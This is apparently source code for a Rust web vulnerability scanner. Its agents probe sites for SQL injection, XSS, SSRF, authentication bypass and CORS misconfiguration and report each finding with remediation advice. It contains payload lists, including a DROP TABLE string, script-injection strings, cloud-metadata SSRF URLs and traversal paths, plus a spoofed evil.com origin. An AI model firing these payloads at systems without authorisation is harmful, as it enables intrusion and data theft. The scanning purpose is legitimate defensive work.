let evidence = DastEvidence {
request_method: "GET".to_string(),
request_url: error_url.clone(),
request_headers: None,
request_body: None,
response_status: 404,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: None,
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::InformationDisclosure,
"Verbose error messages expose stack traces".to_string(),
"The application exposes detailed error information including stack traces. \
This can reveal internal paths, framework versions, and code structure."
.to_string(),
Severity::Low,
error_url,
"GET".to_string(),
);
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-209".to_string());
finding.remediation = Some(
"Configure the application to use generic error pages in production. \
Do not expose stack traces or internal error details to end users."
.to_string(),
);
findings.push(finding);
}
}
info!(findings = findings.len(), "API fuzzing scan complete");
Ok(findings)
}
}
impl ApiFuzzerAgent {
async fn check_cors(&self, base_url: &str, target_id: &str) -> Option<DastFinding> {
let response = self
.http
.get(base_url)
.header("Origin", "https://evil.com")
.send()
.await
.ok()?;
let headers = response.headers();
let acao = headers
.get("access-control-allow-origin")?
.to_str()
.ok()?;
if acao == "*" || acao == "https://evil.com" {
let acac = headers
.get("access-control-allow-credentials")
.and_then(|v| v.to_str().ok())
.unwrap_or("false");
// Wildcard CORS with credentials is the worst case
let severity = if acac == "true" {
Severity::High
} else if acao == "*" {
Severity::Medium
} else {
Severity::Low
};
let evidence = DastEvidence {
request_method: "GET".to_string(),
request_url: base_url.to_string(),
request_headers: Some(
[("Origin".to_string(), "https://evil.com".to_string())]
.into_iter()
.collect(),
),
request_body: None,
response_status: response.status().as_u16(),
response_headers: Some(
[(
"Access-Control-Allow-Origin".to_string(),
acao.to_string(),
)]
.into_iter()
.collect(),
),
response_snippet: None,
screenshot_path: None,
payload: None,
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.to_string(),
DastVulnType::SecurityMisconfiguration,
"CORS misconfiguration allows arbitrary origins".to_string(),
format!(
"The server responds with Access-Control-Allow-Origin: {acao} \
which may allow cross-origin attacks."
),
severity,
base_url.to_string(),
"GET".to_string(),
);
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-942".to_string());
finding.remediation = Some(
"Configure CORS to only allow trusted origins. \
Never use wildcard (*) with credentials."
.to_string(),
);
Some(finding)
} else {
None
}
}
}

View File

@@ -0,0 +1,219 @@
use compliance_core::error::CoreError;
use compliance_core::models::dast::{DastEvidence, DastFinding, DastTarget, DastVulnType};
use compliance_core::models::Severity;
use compliance_core::traits::dast_agent::{DastAgent, DastContext};
use tracing::info;
/// Authentication bypass testing agent
pub struct AuthBypassAgent {
http: reqwest::Client,
}
impl AuthBypassAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
}
impl DastAgent for AuthBypassAgent {
fn name(&self) -> &str {
"auth_bypass"
}
async fn run(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
let mut findings = Vec::new();
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
// Test 1: Access protected endpoints without authentication
for endpoint in &context.endpoints {
if !endpoint.requires_auth {
continue;
}
// Try accessing without auth
let response = match self.http.get(&endpoint.url).send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
// If we get 200 on a supposedly auth-required endpoint
if status == 200 {
let body = response.text().await.unwrap_or_default();
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: "GET".to_string(),
request_url: endpoint.url.clone(),
request_headers: None,
request_body: None,
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: None,
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::AuthBypass,
format!("Authentication bypass on {}", endpoint.url),
format!(
"Protected endpoint {} returned HTTP 200 without authentication credentials.",
endpoint.url
),
Severity::Critical,
endpoint.url.clone(),
"GET".to_string(),
);
finding.exploitable = true;
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-287".to_string());
finding.remediation = Some(
"Ensure all protected endpoints validate authentication tokens. \
Implement server-side authentication checks that cannot be bypassed."
.to_string(),
);
findings.push(finding);
}
}
// Test 2: HTTP method tampering
let methods = ["PUT", "PATCH", "DELETE", "OPTIONS"];
for endpoint in &context.endpoints {
if endpoint.method != "GET" && endpoint.method != "POST" {
continue;
}
for method in &methods {
let response = match self
.http
.request(
reqwest::Method::from_bytes(method.as_bytes())
.unwrap_or(reqwest::Method::GET),
&endpoint.url,
)
.send()
.await
{
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
// If a non-standard method returns 200 when it shouldn't
if status == 200 && *method == "DELETE" && !target.allow_destructive {
let evidence = DastEvidence {
request_method: method.to_string(),
request_url: endpoint.url.clone(),
request_headers: None,
request_body: None,
response_status: status,
response_headers: None,
response_snippet: None,
screenshot_path: None,
payload: None,
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::AuthBypass,
format!("HTTP method tampering: {} accepted on {}", method, endpoint.url),
format!(
"Endpoint {} accepts {} requests which may bypass access controls.",
endpoint.url, method
),
Severity::Medium,
endpoint.url.clone(),
method.to_string(),
);
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-288".to_string());
findings.push(finding);
}
}
}
// Test 3: Path traversal for auth bypass
let traversal_paths = [
"/../admin",
"/..;/admin",
"/%2e%2e/admin",
"/admin%00",
"/ADMIN",
"/Admin",
];
for path in &traversal_paths {
let test_url = format!("{}{}", target.base_url.trim_end_matches('/'), path);
let response = match self.http.get(&test_url).send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
if status == 200 {
let body = response.text().await.unwrap_or_default();
// Check if response looks like an admin page
let body_lower = body.to_lowercase();
if body_lower.contains("admin")
|| body_lower.contains("dashboard")
|| body_lower.contains("management")
{
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: "GET".to_string(),
request_url: test_url.clone(),
request_headers: None,
request_body: None,
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: Some(path.to_string()),
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::AuthBypass,
format!("Path traversal auth bypass: {path}"),
format!(
"Possible authentication bypass via path traversal. \
Accessing '{}' returned admin-like content.",
test_url
),
Severity::High,
test_url,
"GET".to_string(),
);
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-22".to_string());
findings.push(finding);
break;
}
}
}
info!(findings = findings.len(), "Auth bypass scan complete");
Ok(findings)
}
}

View File

@@ -0,0 +1,195 @@
use compliance_core::error::CoreError;
use compliance_core::models::dast::{DastEvidence, DastFinding, DastTarget, DastVulnType};
use compliance_core::models::Severity;
use compliance_core::traits::dast_agent::{DastAgent, DastContext};
use tracing::{info, warn};
/// SQL Injection testing agent
pub struct SqlInjectionAgent {
http: reqwest::Client,
}
impl SqlInjectionAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
/// Test payloads for SQL injection detection
fn payloads(&self) -> Vec<(&str, &str)> {
vec![
("' OR '1'='1", "boolean-based blind"),
("1' AND SLEEP(2)-- -", "time-based blind"),
("' UNION SELECT NULL--", "union-based"),
("1; DROP TABLE test--", "stacked queries"),
("' OR 1=1#", "mysql boolean"),
("1' ORDER BY 1--", "order by probe"),
("') OR ('1'='1", "parenthesis bypass"),
]
}
/// Error patterns that indicate SQL injection
fn error_patterns(&self) -> Vec<&str> {
vec![
"sql syntax",
"mysql_fetch",
"ORA-01756",
"SQLite3::query",
"pg_query",
"unclosed quotation mark",
"quoted string not properly terminated",
"you have an error in your sql",
"warning: mysql",
"microsoft sql native client error",
"postgresql query failed",
"unterminated string",
"syntax error at or near",
]
}
}
impl DastAgent for SqlInjectionAgent {
fn name(&self) -> &str {
"sql_injection"
}
async fn run(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
let mut findings = Vec::new();
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
for endpoint in &context.endpoints {
// Only test endpoints with parameters
if endpoint.parameters.is_empty() {
continue;
}
for param in &endpoint.parameters {
for (payload, technique) in self.payloads() {
// Build the request with the injection payload
let test_url = if endpoint.method == "GET" {
format!(
"{}?{}={}",
endpoint.url,
param.name,
urlencoding::encode(payload)
)
} else {
endpoint.url.clone()
};
let request = if endpoint.method == "POST" {
self.http
.post(&endpoint.url)
.form(&[(param.name.as_str(), payload)])
} else {
self.http.get(&test_url)
};
let response = match request.send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
let headers: std::collections::HashMap<String, String> = response
.headers()
.iter()
.map(|(k, v)| (k.to_string(), v.to_str().unwrap_or("").to_string()))
.collect();
let body = response.text().await.unwrap_or_default();
// Check for SQL error patterns in response
let body_lower = body.to_lowercase();
let is_vulnerable = self
.error_patterns()
.iter()
.any(|pattern| body_lower.contains(pattern));
if is_vulnerable {
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: endpoint.method.clone(),
request_url: test_url.clone(),
request_headers: None,
request_body: if endpoint.method == "POST" {
Some(format!("{}={}", param.name, payload))
} else {
None
},
response_status: status,
response_headers: Some(headers),
response_snippet: Some(snippet),
screenshot_path: None,
payload: Some(payload.to_string()),
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(), // scan_run_id set by orchestrator
target_id.clone(),
DastVulnType::SqlInjection,
format!("SQL Injection ({technique}) in parameter '{}'", param.name),
format!(
"SQL injection vulnerability detected in parameter '{}' at {} using {} technique. \
The server returned SQL error messages in response to the injected payload.",
param.name, endpoint.url, technique
),
Severity::Critical,
endpoint.url.clone(),
endpoint.method.clone(),
);
finding.parameter = Some(param.name.clone());
finding.exploitable = true;
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-89".to_string());
finding.remediation = Some(
"Use parameterized queries or prepared statements. \
Never concatenate user input into SQL queries."
.to_string(),
);
findings.push(finding);
warn!(
endpoint = %endpoint.url,
param = %param.name,
technique,
"SQL injection found"
);
// Don't test more payloads for same param once confirmed
break;
}
}
}
}
info!(findings = findings.len(), "SQL injection scan complete");
Ok(findings)
}
}
/// URL-encode a string for query parameters
mod urlencoding {
pub fn encode(input: &str) -> String {
let mut encoded = String::new();
for byte in input.bytes() {
match byte {
b'A'..=b'Z' | b'a'..=b'z' | b'0'..=b'9' | b'-' | b'_' | b'.' | b'~' => {
encoded.push(byte as char);
}
_ => {
encoded.push_str(&format!("%{:02X}", byte));
}
}
}
encoded
}
}

View File

@@ -0,0 +1,5 @@
pub mod api_fuzzer;
pub mod auth_bypass;
pub mod injection;
pub mod ssrf;
pub mod xss;

View File

@@ -0,0 +1,169 @@
use compliance_core::error::CoreError;
use compliance_core::models::dast::{DastEvidence, DastFinding, DastTarget, DastVulnType};
use compliance_core::models::Severity;
use compliance_core::traits::dast_agent::{DastAgent, DastContext};
use tracing::info;
/// Server-Side Request Forgery (SSRF) testing agent
pub struct SsrfAgent {
http: reqwest::Client,
}
impl SsrfAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
fn payloads(&self) -> Vec<(&str, &str)> {
vec![
("http://127.0.0.1", "localhost IPv4"),
("http://[::1]", "localhost IPv6"),
("http://0.0.0.0", "zero address"),
("http://169.254.169.254/latest/meta-data/", "AWS metadata"),
(
"http://metadata.google.internal/",
"GCP metadata",
),
("http://127.0.0.1:22", "SSH port probe"),
("http://127.0.0.1:3306", "MySQL port probe"),
("http://localhost/admin", "localhost admin"),
]
}
fn internal_indicators(&self) -> Vec<&str> {
vec![
"ami-id",
"instance-id",
"local-hostname",
"public-hostname",
"iam/security-credentials",
"computeMetadata",
"OpenSSH",
"mysql_native_password",
"root:x:0:",
"<!DOCTYPE html>",
]
}
}
impl DastAgent for SsrfAgent {
fn name(&self) -> &str {
"ssrf"
}
async fn run(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
let mut findings = Vec::new();
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
// Find endpoints with URL-like parameters
for endpoint in &context.endpoints {
let url_params: Vec<_> = endpoint
.parameters
.iter()
.filter(|p| {
let name_lower = p.name.to_lowercase();
name_lower.contains("url")
|| name_lower.contains("uri")
|| name_lower.contains("link")
|| name_lower.contains("src")
|| name_lower.contains("redirect")
|| name_lower.contains("callback")
|| name_lower.contains("fetch")
|| name_lower.contains("load")
})
.collect();
if url_params.is_empty() {
continue;
}
for param in &url_params {
for (payload, technique) in self.payloads() {
let request = if endpoint.method == "POST" {
self.http
.post(&endpoint.url)
.form(&[(param.name.as_str(), payload)])
} else {
let test_url = format!(
"{}?{}={}",
endpoint.url, param.name, payload
);
self.http.get(&test_url)
};
let response = match request.send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
let body = response.text().await.unwrap_or_default();
// Check for SSRF indicators
let body_lower = body.to_lowercase();
let is_vulnerable = self
.internal_indicators()
.iter()
.any(|indicator| body_lower.contains(&indicator.to_lowercase()));
if is_vulnerable {
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: endpoint.method.clone(),
request_url: endpoint.url.clone(),
request_headers: None,
request_body: Some(format!("{}={}", param.name, payload)),
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: Some(payload.to_string()),
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::Ssrf,
format!(
"SSRF ({technique}) via parameter '{}'",
param.name
),
format!(
"Server-side request forgery detected in parameter '{}' at {}. \
The application made a request to an internal resource ({}).",
param.name, endpoint.url, payload
),
Severity::High,
endpoint.url.clone(),
endpoint.method.clone(),
);
finding.parameter = Some(param.name.clone());
finding.exploitable = true;
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-918".to_string());
finding.remediation = Some(
"Validate and sanitize all user-supplied URLs. \
Use allowlists for permitted domains and block internal IP ranges."
.to_string(),
);
findings.push(finding);
break;
}
}
}
}
info!(findings = findings.len(), "SSRF scan complete");
Ok(findings)
}
}

View File

@@ -0,0 +1,147 @@
use compliance_core::error::CoreError;
use compliance_core::models::dast::{DastEvidence, DastFinding, DastTarget, DastVulnType};
use compliance_core::models::Severity;
use compliance_core::traits::dast_agent::{DastAgent, DastContext};
use tracing::info;
/// Cross-Site Scripting (XSS) testing agent
pub struct XssAgent {
http: reqwest::Client,
}
impl XssAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
fn payloads(&self) -> Vec<(&str, &str)> {
vec![
("<script>alert(1)</script>", "basic script injection"),
(
"<img src=x onerror=alert(1)>",
"event handler injection",
),
(
"<svg/onload=alert(1)>",
"svg event handler",
),
(
"javascript:alert(1)",
"javascript protocol",
),
(
"'\"><script>alert(1)</script>",
"attribute breakout",
),
(
"<body onload=alert(1)>",
"body event handler",
),
]
}
}
impl DastAgent for XssAgent {
fn name(&self) -> &str {
"xss"
}
async fn run(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
let mut findings = Vec::new();
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
for endpoint in &context.endpoints {
if endpoint.parameters.is_empty() {
continue;
}
for param in &endpoint.parameters {
for (payload, technique) in self.payloads() {
let test_url = if endpoint.method == "GET" {
format!(
"{}?{}={}",
endpoint.url, param.name, payload
)
} else {
endpoint.url.clone()
};
let request = if endpoint.method == "POST" {
self.http
.post(&endpoint.url)
.form(&[(param.name.as_str(), payload)])
} else {
self.http.get(&test_url)
};
let response = match request.send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
let body = response.text().await.unwrap_or_default();
// Check if payload is reflected in response without encoding
if body.contains(payload) {
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: endpoint.method.clone(),
request_url: test_url.clone(),
request_headers: None,
request_body: if endpoint.method == "POST" {
Some(format!("{}={}", param.name, payload))
} else {
None
},
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: Some(payload.to_string()),
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::Xss,
format!("Reflected XSS ({technique}) in parameter '{}'", param.name),
format!(
"Cross-site scripting vulnerability detected in parameter '{}' at {}. \
The injected payload was reflected in the response without proper encoding.",
param.name, endpoint.url
),
Severity::High,
endpoint.url.clone(),
endpoint.method.clone(),
);
finding.parameter = Some(param.name.clone());
finding.exploitable = true;
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-79".to_string());
finding.remediation = Some(
"Encode all user input before rendering in HTML context. \
Use Content-Security-Policy headers to mitigate impact."
.to_string(),
);
findings.push(finding);
break;
}
}
}
}
info!(findings = findings.len(), "XSS scan complete");
Ok(findings)
}
}

View File

@@ -0,0 +1,200 @@
use std::collections::HashSet;
use compliance_core::error::CoreError;
use compliance_core::traits::dast_agent::{DiscoveredEndpoint, EndpointParameter};
use scraper::{Html, Selector};
use tracing::info;
use url::Url;
/// Web crawler that discovers endpoints and forms
pub struct WebCrawler {
http: reqwest::Client,
max_depth: u32,
rate_limit_ms: u64,
}
impl WebCrawler {
pub fn new(http: reqwest::Client, max_depth: u32, rate_limit_ms: u64) -> Self {
Self {
http,
max_depth,
rate_limit_ms,
}
}
/// Crawl a target starting from the base URL
pub async fn crawl(
&self,
base_url: &str,
excluded_paths: &[String],
) -> Result<Vec<DiscoveredEndpoint>, CoreError> {
let base = Url::parse(base_url)
.map_err(|e| CoreError::Dast(format!("Invalid base URL: {e}")))?;
let mut visited: HashSet<String> = HashSet::new();
let mut endpoints: Vec<DiscoveredEndpoint> = Vec::new();
let mut queue: Vec<(String, u32)> = vec![(base_url.to_string(), 0)];
while let Some((url, depth)) = queue.pop() {
if depth > self.max_depth {
continue;
}
if visited.contains(&url) {
continue;
}
// Check exclusions
if excluded_paths
.iter()
.any(|excl| url.contains(excl.as_str()))
{
continue;
}
visited.insert(url.clone());
// Rate limiting
if self.rate_limit_ms > 0 {
tokio::time::sleep(tokio::time::Duration::from_millis(self.rate_limit_ms)).await;
}
// Fetch the page
let response = match self.http.get(&url).send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status();
let content_type = response
.headers()
.get("content-type")
.and_then(|v| v.to_str().ok())
.unwrap_or("")
.to_string();
// Record this endpoint
endpoints.push(DiscoveredEndpoint {
url: url.clone(),
method: "GET".to_string(),
parameters: Vec::new(),
content_type: Some(content_type.clone()),
requires_auth: status.as_u16() == 401 || status.as_u16() == 403,
});
if !content_type.contains("text/html") {
continue;
}
let body = match response.text().await {
Ok(b) => b,
Err(_) => continue,
};
// Parse HTML for links and forms
let document = Html::parse_document(&body);
// Extract links
let link_selector =
Selector::parse("a[href]").unwrap_or_else(|_| Selector::parse("a").expect("valid selector"));
for element in document.select(&link_selector) {
if let Some(href) = element.value().attr("href") {
if let Some(absolute_url) = self.resolve_url(&base, &url, href) {
if self.is_same_origin(&base, &absolute_url) && !visited.contains(&absolute_url)
{
queue.push((absolute_url, depth + 1));
}
}
}
}
// Extract forms
let form_selector = Selector::parse("form")
.unwrap_or_else(|_| Selector::parse("form").expect("valid selector"));
let input_selector = Selector::parse("input, select, textarea")
.unwrap_or_else(|_| Selector::parse("input").expect("valid selector"));
for form in document.select(&form_selector) {
let action = form.value().attr("action").unwrap_or("");
let method = form
.value()
.attr("method")
.unwrap_or("GET")
.to_uppercase();
let form_url = self
.resolve_url(&base, &url, action)
.unwrap_or_else(|| url.clone());
let mut params = Vec::new();
for input in form.select(&input_selector) {
let name = input
.value()
.attr("name")
.unwrap_or("")
.to_string();
if name.is_empty() {
continue;
}
let input_type = input
.value()
.attr("type")
.unwrap_or("text")
.to_string();
let location = if method == "GET" {
"query".to_string()
} else {
"body".to_string()
};
params.push(EndpointParameter {
name,
location,
param_type: Some(input_type),
example_value: input.value().attr("value").map(|v| v.to_string()),
});
}
endpoints.push(DiscoveredEndpoint {
url: form_url,
method,
parameters: params,
content_type: Some("application/x-www-form-urlencoded".to_string()),
requires_auth: false,
});
}
}
info!(endpoints = endpoints.len(), "Crawling complete");
Ok(endpoints)
}
fn resolve_url(&self, _base: &Url, current_page: &str, href: &str) -> Option<String> {
// Skip anchors, javascript:, mailto:, etc.
if href.starts_with('#')
|| href.starts_with("javascript:")
|| href.starts_with("mailto:")
|| href.starts_with("tel:")
{
return None;
}
if let Ok(absolute) = Url::parse(href) {
return Some(absolute.to_string());
}
// Relative URL
let current = Url::parse(current_page).ok()?;
current.join(href).ok().map(|u| u.to_string())
}
fn is_same_origin(&self, base: &Url, url: &str) -> bool {
if let Ok(parsed) = Url::parse(url) {
parsed.host() == base.host() && parsed.scheme() == base.scheme()
} else {
false
}
}
}

View File

@@ -0,0 +1,6 @@
pub mod agents;
pub mod crawler;
pub mod orchestrator;
pub mod recon;
pub use orchestrator::DastOrchestrator;

View File

@@ -0,0 +1,3 @@
pub mod state_machine;
pub use state_machine::DastOrchestrator;

View File

@@ -0,0 +1,203 @@
use chrono::Utc;
use compliance_core::error::CoreError;
use compliance_core::models::dast::{
DastFinding, DastScanPhase, DastScanRun, DastScanStatus, DastTarget,
};
use compliance_core::traits::dast_agent::DastContext;
use tracing::{error, info};
use crate::crawler::WebCrawler;
use crate::recon::ReconAgent;
/// State machine orchestrator for DAST scanning
pub struct DastOrchestrator {
http: reqwest::Client,
rate_limit_ms: u64,
}
impl DastOrchestrator {
pub fn new(rate_limit_ms: u64) -> Self {
Self {
http: reqwest::Client::new(),
rate_limit_ms,
}
}
/// Run a complete DAST scan against a target
pub async fn run_scan(
&self,
target: &DastTarget,
sast_hints: Vec<String>,
) -> Result<(DastScanRun, Vec<DastFinding>), CoreError> {
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
let mut scan_run = DastScanRun::new(target_id);
let mut all_findings = Vec::new();
info!(target = %target.base_url, "Starting DAST scan");
// Phase 1: Reconnaissance
scan_run.current_phase = DastScanPhase::Reconnaissance;
let recon = ReconAgent::new(self.http.clone());
let recon_result = match recon.scan(&target.base_url).await {
Ok(r) => r,
Err(e) => {
error!(error = %e, "Reconnaissance failed");
scan_run.status = DastScanStatus::Failed;
scan_run.error_message = Some(format!("Reconnaissance failed: {e}"));
scan_run.completed_at = Some(Utc::now());
return Ok((scan_run, all_findings));
}
};
scan_run
.phases_completed
.push(DastScanPhase::Reconnaissance);
info!(
technologies = ?recon_result.technologies,
headers = recon_result.interesting_headers.len(),
"Reconnaissance complete"
);
// Phase 2: Crawling
scan_run.current_phase = DastScanPhase::Crawling;
let crawler = WebCrawler::new(
self.http.clone(),
target.max_crawl_depth,
self.rate_limit_ms,
);
let endpoints = match crawler
.crawl(&target.base_url, &target.excluded_paths)
.await
{
Ok(e) => e,
Err(e) => {
error!(error = %e, "Crawling failed");
scan_run.status = DastScanStatus::Failed;
scan_run.error_message = Some(format!("Crawling failed: {e}"));
scan_run.completed_at = Some(Utc::now());
return Ok((scan_run, all_findings));
}
};
scan_run.endpoints_discovered = endpoints.len() as u32;
scan_run.phases_completed.push(DastScanPhase::Crawling);
info!(endpoints = endpoints.len(), "Crawling complete");
// Build context for vulnerability agents
let context = DastContext {
endpoints,
technologies: recon_result.technologies,
sast_hints,
};
// Phase 3: Vulnerability Analysis
scan_run.current_phase = DastScanPhase::VulnerabilityAnalysis;
let vuln_findings = self.run_vulnerability_agents(target, &context).await?;
all_findings.extend(vuln_findings);
scan_run
.phases_completed
.push(DastScanPhase::VulnerabilityAnalysis);
// Phase 4: Exploitation (verify findings)
scan_run.current_phase = DastScanPhase::Exploitation;
// Exploitation is handled within each agent's evidence collection
scan_run.phases_completed.push(DastScanPhase::Exploitation);
// Phase 5: Reporting
scan_run.current_phase = DastScanPhase::Reporting;
scan_run.findings_count = all_findings.len() as u32;
scan_run.exploitable_count = all_findings.iter().filter(|f| f.exploitable).count() as u32;
scan_run.phases_completed.push(DastScanPhase::Reporting);
scan_run.status = DastScanStatus::Completed;
scan_run.current_phase = DastScanPhase::Completed;
scan_run.completed_at = Some(Utc::now());
info!(
findings = scan_run.findings_count,
exploitable = scan_run.exploitable_count,
"DAST scan complete"
);
Ok((scan_run, all_findings))
}
/// Run all vulnerability testing agents in parallel
async fn run_vulnerability_agents(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
use compliance_core::traits::DastAgent;
let http = self.http.clone();
// Spawn each agent as a separate tokio task
let t1 = target.clone();
let c1 = context.clone();
let h1 = http.clone();
let sqli_handle = tokio::spawn(async move {
crate::agents::injection::SqlInjectionAgent::new(h1)
.run(&t1, &c1)
.await
});
let t2 = target.clone();
let c2 = context.clone();
let h2 = http.clone();
let xss_handle = tokio::spawn(async move {
crate::agents::xss::XssAgent::new(h2)
.run(&t2, &c2)
.await
});
let t3 = target.clone();
let c3 = context.clone();
let h3 = http.clone();
let auth_handle = tokio::spawn(async move {
crate::agents::auth_bypass::AuthBypassAgent::new(h3)
.run(&t3, &c3)
.await
});
let t4 = target.clone();
let c4 = context.clone();
let h4 = http.clone();
let ssrf_handle = tokio::spawn(async move {
crate::agents::ssrf::SsrfAgent::new(h4)
.run(&t4, &c4)
.await
});
let t5 = target.clone();
let c5 = context.clone();
let h5 = http;
let api_handle = tokio::spawn(async move {
crate::agents::api_fuzzer::ApiFuzzerAgent::new(h5)
.run(&t5, &c5)
.await
});
let handles: Vec<tokio::task::JoinHandle<Result<Vec<DastFinding>, CoreError>>> =
vec![sqli_handle, xss_handle, auth_handle, ssrf_handle, api_handle];
let mut all_findings = Vec::new();
for handle in handles {
match handle.await {
Ok(Ok(findings)) => all_findings.extend(findings),
Ok(Err(e)) => {
error!(error = %e, "Agent failed");
}
Err(e) => {
error!(error = %e, "Agent task panicked");
}
}
}
Ok(all_findings)
}
}

View File

@@ -0,0 +1,132 @@
use std::collections::HashMap;
use compliance_core::error::CoreError;
use tracing::info;
/// Result of reconnaissance scanning
#[derive(Debug, Clone)]
pub struct ReconResult {
pub technologies: Vec<String>,
pub interesting_headers: HashMap<String, String>,
pub server: Option<String>,
pub open_ports: Vec<u16>,
}
/// Agent that performs reconnaissance on a target
pub struct ReconAgent {
http: reqwest::Client,
}
impl ReconAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
/// Perform reconnaissance on a target URL
pub async fn scan(&self, base_url: &str) -> Result<ReconResult, CoreError> {
let mut result = ReconResult {
technologies: Vec::new(),
interesting_headers: HashMap::new(),
server: None,
open_ports: Vec::new(),
};
// HTTP header fingerprinting
let response = self
.http
.get(base_url)
.send()
.await
.map_err(|e| CoreError::Dast(format!("Failed to connect to target: {e}")))?;
let headers = response.headers();
// Extract server info
if let Some(server) = headers.get("server") {
let server_str = server.to_str().unwrap_or("unknown").to_string();
result.server = Some(server_str.clone());
result.technologies.push(server_str);
}
// Detect technologies from headers
let security_headers = [
"x-powered-by",
"x-aspnet-version",
"x-frame-options",
"x-xss-protection",
"x-content-type-options",
"strict-transport-security",
"content-security-policy",
"x-generator",
];
for header_name in &security_headers {
if let Some(value) = headers.get(*header_name) {
let value_str = value.to_str().unwrap_or("").to_string();
result
.interesting_headers
.insert(header_name.to_string(), value_str.clone());
if *header_name == "x-powered-by" || *header_name == "x-generator" {
result.technologies.push(value_str);
}
}
}
// Check for missing security headers
let missing_security = [
"strict-transport-security",
"x-content-type-options",
"x-frame-options",
];
for header in &missing_security {
if !headers.contains_key(*header) {
result.interesting_headers.insert(
format!("missing:{header}"),
"Not present".to_string(),
);
}
}
// Detect technology from response body
let body = response
.text()
.await
.map_err(|e| CoreError::Dast(format!("Failed to read response: {e}")))?;
self.detect_technologies_from_body(&body, &mut result);
info!(
url = base_url,
technologies = ?result.technologies,
"Reconnaissance complete"
);
Ok(result)
}
fn detect_technologies_from_body(&self, body: &str, result: &mut ReconResult) {
let patterns = [
("React", r#"react"#),
("Angular", r#"ng-version"#),
("Vue.js", r#"vue"#),
("jQuery", r#"jquery"#),
("WordPress", r#"wp-content"#),
("Django", r#"csrfmiddlewaretoken"#),
("Rails", r#"csrf-token"#),
("Laravel", r#"laravel"#),
("Express", r#"express"#),
("Next.js", r#"__NEXT_DATA__"#),
("Nuxt.js", r#"__NUXT__"#),
];
let body_lower = body.to_lowercase();
for (tech, pattern) in &patterns {
if body_lower.contains(&pattern.to_lowercase()) {
if !result.technologies.contains(&tech.to_string()) {
result.technologies.push(tech.to_string());
}
}
}
}
}

View File

@@ -0,0 +1,37 @@
[package]
name = "compliance-graph"
version = "0.1.0"
edition = "2021"
[lints]
workspace = true
[dependencies]
compliance-core = { workspace = true, features = ["mongodb"] }
serde = { workspace = true }
serde_json = { workspace = true }
chrono = { workspace = true }
thiserror = { workspace = true }
tracing = { workspace = true }
uuid = { workspace = true }
tokio = { workspace = true }
mongodb = { workspace = true }
# Tree-sitter parsing
tree-sitter = "0.24"
tree-sitter-rust = "0.23"
tree-sitter-python = "0.23"
tree-sitter-javascript = "0.23"
tree-sitter-typescript = "0.23"
# Graph algorithms
petgraph = "0.7"
# Text search
tantivy = "0.22"
# Serialization
bson = "2"
# Async streams
futures-util = "0.3"

View File

@@ -0,0 +1,256 @@
use std::collections::HashMap;
use petgraph::graph::NodeIndex;
use petgraph::visit::EdgeRef;
use tracing::info;
use super::engine::CodeGraph;
/// Run Louvain community detection on the code graph.
/// Returns the number of communities detected.
/// Mutates node community_id in place.
pub fn detect_communities(code_graph: &CodeGraph) -> u32 {
let graph = &code_graph.graph;
let node_count = graph.node_count();
if node_count == 0 {
return 0;
}
// Initialize: each node in its own community
